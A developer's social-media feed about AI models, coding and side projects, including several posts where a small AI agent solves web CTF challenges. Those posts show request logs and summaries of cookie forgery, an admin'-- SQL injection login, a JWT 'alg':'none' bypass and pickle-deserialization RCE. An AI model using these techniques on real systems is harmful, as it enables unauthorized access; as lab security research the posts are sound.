Sign in

Nimo 🏳️‍🌈

@nimobeeren.com
2.3K followers 331 following 747 posts

he/him Building cool things with or without AI (mostly with) — 🧪🎹💻🌸📷🔧📔 🌐 nimobeeren.com 📍 Eindhoven

PostsRepliesMedia
Nimo 🏳️‍🌈 @nimobeeren.com · 03/09/2026
Would be nice if they actually measured time for their new model on all benchmarks 🤭
000
Nimo 🏳️‍🌈 @nimobeeren.com · 03/09/2026
Ooh I love that labs are including time to complete a task on benchmarks now. This affects my model choice more than cost a lot of the time
1100
Nimo 🏳️‍🌈 @nimobeeren.com · 17/08/2026
Border radii are my passion.
A stack of MacOS windows, each having a slightly different border radius so they are all visible
000
Nimo 🏳️‍🌈 @nimobeeren.com · 14/08/2026
okay I'm bored now
100
Nimo 🏳️‍🌈 @nimobeeren.com · 12/06/2026
It’s giving a 404 for me!
010
Nimo 🏳️‍🌈 @nimobeeren.com · 09/05/2026
Yeah, this just changed my view. Starting from scratch risks building the wrong thing, whereas other companies can be a good proxy for what you want to do. simonwillison.net/2026/May/6/v...
On the threat to SaaS providers of companies rolling their own solutions instead:

I just realized it’s the thing I said earlier about how I only want to use your side project if you’ve used it for a few weeks. The enterprise version of that is I don’t want a CRM unless at least two other giant enterprises have successfully used that CRM for six months. [...] You want solutions that are proven to work before you take a risk on them.
071
Nimo 🏳️‍🌈 @nimobeeren.com · 05/03/2026
Back on that virtual try-on shit ✨
110
Nimo 🏳️‍🌈 @nimobeeren.com · 18/02/2026
Looks like Sonnet 4.6 is much less token efficient, which brings it close to Opus cost level. A bit disappointing!
1120
Nimo 🏳️‍🌈 @nimobeeren.com · 17/02/2026
Ooh, I like this direction. I’ve been experimenting with keeping thinking disabled for straightforward tasks, mainly for speed.
Sonnet 4.6 offers strong performance at any thinking effort, even with extended thinking off. As part of your migration from Sonnet 4.5, we recommend exploring across the spectrum to find the ideal balance of speed and reliable performance, depending on what you’re building.
140
Nimo 🏳️‍🌈 @nimobeeren.com · 30/01/2026
I wish models didn't leave code comments like this. It only serves to highlight the current change, but has no value to readers of the code in the future. Haven't been able to prompt this out yet.
Code diff snippet where an image URL was replaced with a R2 URL, and a comment above it saying "Wearable images use signed URLs directly from R2"
4180
Nimo 🏳️‍🌈 @nimobeeren.com · 27/01/2026
Subagents just landed in Cursor 2.4! I think these will be especially useful for tasks at scale, e.g. create 100 components/pages/test suites in parallel. They also ship some subagents which run automatically. This looks like a nice optimization to avoid context bloat.
A table from Cursor docs describing the three types of built-in subagents: Explore, Bash, Browser. (See docs link in next post)
131
Nimo 🏳️‍🌈 @nimobeeren.com · 14/01/2026
Claude just complimented my incredible prompting skills 😌
A chat interface where the user said "think about any edge cases" and Claude replied with "Good thinking prompt. Let me analyze potential edge cases in this deletion/restoration flow:"
130
Nimo 🏳️‍🌈 @nimobeeren.com · 11/01/2026
I also found some interesting "hidden rules" about the game. Despite being legal, you never _need_ a strand to cross itself or another strand. Example: the word LIME in this image from the tutorial would never actually appear in a solution, because it requires crossing itself.
A grid of letters with the words BANANA, APPLE and LIME marked in blue. The word LIME creates a crossing strand.
100
Nimo 🏳️‍🌈 @nimobeeren.com · 11/01/2026
We love predictable optimizations. Easy puzzles got a bit slower, hard puzzles got a lot faster 🚀 This was the result of integrating strand crossing checks into the search, rather than post-filtering them.
A table showing puzzle date, old time, new time and change.

Puzzles with an old time between 0-2s got a few seconds slower, while the rest got much faster (up to 60%).

Full table data:

| Puzzle Date | OLD Time | NEW Time | Change |
|-------------|----------|----------|--------|
| 2025-10-01  | 1.9s     | 4.9s     | **+3.0s slower** |
| 2025-10-02  | 18.1s    | 14.5s    | **-3.6s faster** |
| 2025-10-03  | 34.4s    | 26.0s    | **-8.4s faster** |
| 2025-10-04  | **>90s TIMEOUT** | 56.3s | **🎉 FIXED!** |
| 2025-10-05  | 64.4s    | 25.8s    | **-38.6s faster (60%!)** |
| 2025-10-06  | 1.1s     | 2.0s     | +0.9s slower |
| 2025-10-07  | 1.0s     | 1.8s     | +0.8s slower |
| 2025-10-08  | 7.1s     | 4.9s     | **-2.2s faster** |
| 2025-10-09  | >90s     | >90s     | same (still timeout) |
| 2025-10-10  | 0.7s     | 3.6s     | +2.9s slower |
100
Nimo 🏳️‍🌈 @nimobeeren.com · 08/01/2026
I was messing around with Opus to generate an evals app for voice AI apps. I asked it to generate some mock audio files and it kinda bops 💿
060
Nimo 🏳️‍🌈 @nimobeeren.com · 04/01/2026
Cloud agent goes brrrr
GitHub diff with 7 files changed with 172.843 lines added and 13 lines removed in 1 commit
100
Nimo 🏳️‍🌈 @nimobeeren.com · 03/01/2026
In the category of things I wouldn't have done without AI help: I made a benchmark script for my Strands solver! Now I know how well it does at solving ~100 real puzzles: github.com/nimobeeren/s... Pass rate of ~19% means there is work to be done!
benchmark

Benchmark the solver against a set of puzzles. Results are saved to a Markdown file.

uv run strands-solver benchmark                              # default: 2025-09-01 to 2025-12-31
uv run strands-solver benchmark -s 2025-10-01 -e 2025-10-31  # custom date range
uv run strands-solver benchmark -t 30                        # 30 second timeout per puzzle
uv run strands-solver benchmark -r ./my_results.md           # custom results file
010
Nimo 🏳️‍🌈 @nimobeeren.com · 08/08/2025
Trying to figure out how to map the models named in the system card to the API models. This seems right, but where is gpt-5-main-mini? Is it just gpt-5-mini with reasoning effort set to minimal?
000
Nimo 🏳️‍🌈 @nimobeeren.com · 08/08/2025
RIP temperature?
JSON object:

{
    "error": {
        "message": "Unsupported value: 'temperature' does not support 0.7 with this model. Only the default (1) value is supported.",
        "type": "invalid_request_error",
        "param": "temperature",
        "code": "unsupported_value"
    }
}
010
Nimo 🏳️‍🌈 @nimobeeren.com · 17/07/2025
This concept of self-containment explains why LLM responses often feel unnatural to me, especially in a voice context. They try to restate my input rather than just giving an answer like a human would. Surprisingly hard to prompt around! From "There are Only 6 RAG Evals" jxnl.co/writing/2025...
6. Self-Containment (Q|A)

- Definition: Can the original question be inferred from the answer alone? This measures whether the answer provides enough context to stand on its own.

This connects to our discussion of monologues and chain-of-thought approaches that make thinking visible. Answers that restate and address the core question directly create better user experiences, especially in asynchronous communication contexts.
010
Nimo 🏳️‍🌈 @nimobeeren.com · 07/07/2025
I made a harder version of my CTF challenge which relies on an RCE exploit by unsafe pickle deserialization. The solution I had in mind was to read a file on the server's disk and send it to a webhook I set up. I let my simple o4-mini agent have a go, not expecting much. But I was surprised! 👀 1/n
Terminal output saying:

🏁 Flag found: CTF{b0f2a7d6d5413b96d8a631bfee4bb0ea}

Summary:
1. Logged in as guest (guest/guest).
2. Noticed session cookie was a base64-encoded pickle.
3. Decoded it to confirm it stored {'username': 'guest'}.
4. Crafted a pickled session for admin by changing username to "admin".
5. Attempted to find an activation endpoint-none existed.
6. Exploited unsafe pickle deserialization for RCE: injected a payload to run cat flag.txt and write it to 'static/flag.txt*
7. Retrieved the flag from the newly created 'static/flag.txt*
🪜 Took 18 steps
⌛ Took 122.23s
100
Nimo 🏳️‍🌈 @nimobeeren.com · 29/06/2025
Vibe coded a couple CTF challenges that I can run locally. Gemini taught me about Traefik which lets me run multiple apps on subdomains of localhost, didn't know that was possible!
A login form for the Glactic Cookie Club at URL cookie1.localhost/login
100
Nimo 🏳️‍🌈 @nimobeeren.com · 29/06/2025
Looks great! 💜
010
Nimo 🏳️‍🌈 @nimobeeren.com · 26/06/2025
It even did a harder variant with a JWT, setting "alg": "none" in the header to bypass the signature check. This is a real exploit that a lot of apps are vulnerable to! cloud.langfuse.com/project/cmca...
Terminal output:

🏁 Here’s how I got the flag:

1. Visited the login page and logged in as the guest user (guest/guest), receiving a JWT session cookie signed with HS256.
2. Noticed there’s no direct admin endpoint, but the site uses a JWT with the “alg” header value determining validation.
3. Crafted a new JWT by changing the header to `"alg":"none"` and the payload to `{"username":"admin"}`, then removed the signature.
4. Sent a request to `/` with this modified session cookie. The server accepted the token (no signature check) and treated me as admin.
5. The page returned the flag in a success alert.

Flag: CTF{16c835fcf5bc3e46b188f3172db03c6b}
🪜 Took 7 steps
⌛ Took 51.33s
100
Nimo 🏳️‍🌈 @nimobeeren.com · 26/06/2025
I guess I haven't posted about this! I made a very simple agent that solves Capture-The-Flag (CTF) cybersecurity challenges. It's less than 100 lines of code and it has only one tool: making HTTP requests. It was able to do several cookie spoofing and SQL injection attacks. Check out what it did!
Terminal containing the following output:

🌐 {
  method: 'GET',
  url: 'https://oceans11.ctf.p0wnparty.nl/',
  headers: [],
  body: ''
}
🌐 {
  method: 'POST',
  url: 'https://oceans11.ctf.p0wnparty.nl/login',
  headers: [
    {
      name: 'Content-Type',
      value: 'application/x-www-form-urlencoded'
    }
  ],
  body: 'username=guest&password=guest'
}
🌐 {
  method: 'GET',
  url: 'https://oceans11.ctf.p0wnparty.nl/',
  headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ICJndWVzdCJ9' } ],
  body: ''
}
🌐 {
  method: 'GET',
  url: 'https://oceans11.ctf.p0wnparty.nl/robots.txt',
  headers: [],
  body: ''
}
🌐 {
  method: 'GET',
  url: 'https://oceans11.ctf.p0wnparty.nl/',
  headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ImFkbWluIn0' } ],
  body: ''
}Terminal showing the following output:

🌐 {
  method: 'GET',
  url: 'https://oceans11.ctf.p0wnparty.nl/admin',
  headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ICJndWVzdCJ9' } ],
  body: ''
}
🌐 {
  method: 'POST',
  url: 'https://oceans11.ctf.p0wnparty.nl/login',
  headers: [
    {
      name: 'Content-Type',
      value: 'application/x-www-form-urlencoded'
    }
  ],
  body: 'username=admin&password=admin'
}
🌐 {
  method: 'POST',
  url: 'https://oceans11.ctf.p0wnparty.nl/login',
  headers: [
    {
      name: 'Content-Type',
      value: 'application/x-www-form-urlencoded'
    }
  ],
  body: "username=admin'--&password=ignored"
}
🌐 {
  method: 'GET',
  url: 'https://oceans11.ctf.p0wnparty.nl/',
  headers: [ { name: 'Cookie', value: 'session=eyJ1c2VybmFtZSI6ImFkbWluIn0=' } ],
  body: ''
}🏁 Here’s a concise breakdown of how I retrieved the flag:

1. Inspected the login page and noticed a guest account (guest:guest) but no printing access.  
2. Logged in as guest to confirm that keycard printing is disabled for that user.  
3. Examined the `session` cookie set after login; it was a Base64‐encoded JSON object, e.g. `eyJ1c2VybmFtZSI6ICJndWVzdCJ9`.  
4. Decoded it to `{"username":"guest"}` and realized the application likely trusts this JSON for authorization.  
5. Modified the JSON to `{"username":"admin"}`, re‐encoded it (resulting in `eyJ1c2VybmFtZSI6ImFkbWluIn0=`) and set that as the `session` cookie.  
6. Reloaded the main page with the forged admin cookie and was shown the hidden admin section containing the flag.

Flag: CTF{df9cef93a5c03f25482eb4192de9bd17}
🪜 Took 10 steps
⌛ Took 75.25s
100
Nimo 🏳️‍🌈 @nimobeeren.com · 26/06/2025
the IT person when setting the session expiry to 30 mins and forcing 2fa on every login
010
Nimo 🏳️‍🌈 @nimobeeren.com · 20/06/2025
I confess I don't get font ligatures. I don't mean turning => into ⇒ (fine if you want that I guess). But things like pic attached. Why did the t get stuck to the i? Where did its extra length come from? Does it hurt when it stretches like that?
010
Nimo 🏳️‍🌈 @nimobeeren.com · 20/05/2025
vid (loading cut out)
100
Nimo 🏳️‍🌈 @nimobeeren.com · 20/05/2025
Made a little nicer UI for uploading clothing items 👖
100
Nimo 🏳️‍🌈 @nimobeeren.com · 20/05/2025
Tried to make a draft PR on our gateway but got stuck on auth. Is there no way to use this with projects not hosted on Vercel? Or can we make a no-op project just for billing and use the token from that?
010
Nimo 🏳️‍🌈 @nimobeeren.com · 21/04/2025
Regular joins with an ON clause also don't work 😕
session.exec(
    select(db.User).join(
        db.AvatarImage,
        db.User.avatar_image_id == db.AvatarImage.id,  # type: ignore
    )
)
000
Nimo 🏳️‍🌈 @nimobeeren.com · 21/04/2025
Today I'm learning that SQLAlchemy and Python type checking don't go so well together. I need a type ignore and a cast to make joinedload work, ouch 😟
# Check if a wearable exists with the given image ID and belongs to the current user
wearable = typing.cast(
    db.Wearable | None,
    session.exec(
        select(db.Wearable)
        .options(joinedload(db.Wearable.wearable_image))  # type: ignore
    ).one_or_none(),
)
100
Nimo 🏳️‍🌈 @nimobeeren.com · 10/04/2025
Interesting announcement when you're just starting a multi-agent project 👀 Don't think I'll be using it immediately since it's not production-ready yet, but I don't mind that we're giving the multi-agent concept a little more shape. developers.googleblog.com/en/a2a-a-new...
000
Nimo 🏳️‍🌈 @nimobeeren.com · 10/04/2025
Looks like a lot of enterprises gave their stamp of approval. I wonder if any of them will actually make some effective agents. Haven't had much success with Agentforce so far.
Collection of enterprise logos titled "Partners contributing to the Agent2Agent protocol"
010
Nimo 🏳️‍🌈 @nimobeeren.com · 07/04/2025
Just started reading the spec and it sounds like the model can also make the decision of which resources to use. spec.modelcontextprotocol.io/specificatio...
Implement automatic context inclusion, based on heuristics or the AI model’s selection
110
Nimo 🏳️‍🌈 @nimobeeren.com · 23/02/2025
AIE Summit 2025 was so much fun! Cheers to all the awesome people I met ✨ Can't wait until the next Summit (I heard Paris? 🥖)
a group of people sitting in an atrium during the AI Engineer Summit 2025 keynote
110
Nimo 🏳️‍🌈 @nimobeeren.com · 19/02/2025
NYC I am in you!!
030
Nimo 🏳️‍🌈 @nimobeeren.com · 31/01/2025
Built a UI for adding clothes! ✨ Upload an image of an item, see how it looks on you and match it with an outfit. I cut out about a minute of loading time 🤫 But we'll get there!
011
Nimo 🏳️‍🌈 @nimobeeren.com · 20/12/2024
You can now favorite outfits! And by you I mean me, because I haven't deployed this anywhere. Are people interested in using this app with their own pic/clothes?
020
Nimo 🏳️‍🌈 @nimobeeren.com · 16/12/2024
Wow, this felt like such a fourth-wall-break
010
Nimo 🏳️‍🌈 @nimobeeren.com · 04/12/2024
yass
000
Nimo 🏳️‍🌈 @nimobeeren.com · 29/11/2024
But wait, there's more! I guess resources, prompts and sampling are like special kinds of tools. What about this mysterious roots thing though? It's not mentioned anywhere else on the docs AFAICT 👀
120
Nimo 🏳️‍🌈 @nimobeeren.com · 29/11/2024
Okay so if I'm getting this MCP thing right, it's exactly the same as tool use, except the server tells the LLM which tools are available?
Interaction Flow diagram, accessible source in next post
220
Nimo 🏳️‍🌈 @nimobeeren.com · 29/11/2024
There are categories now! I spent wayyyy too long on the focus states 😅
000
Nimo 🏳️‍🌈 @nimobeeren.com · 28/11/2024
Took some inspiration from The Sims for this layout 😌
110
Nimo 🏳️‍🌈 @nimobeeren.com · 23/11/2024
I made this GeoGuessr clone for pictures made my members of my local photography club. You can still play it here: dm-guessr.netlify.app
020
Nimo 🏳️‍🌈 @nimobeeren.com · 02/11/2024
Some pictures I took in SF that I really liked!
020
Nimo 🏳️‍🌈 @nimobeeren.com · 31/10/2024
These notifications started appearing for me an hour ago. Does this mean someone created an account from the starter pack page?
Bluesky notification saying "Ishan Anand signed up with your starter pack"
310
Nimo 🏳️‍🌈 @nimobeeren.com · 31/10/2024
010
Nimo 🏳️‍🌈 @nimobeeren.com · 28/10/2024
The "1 label has been placed on this account" text is giving "community notes"
010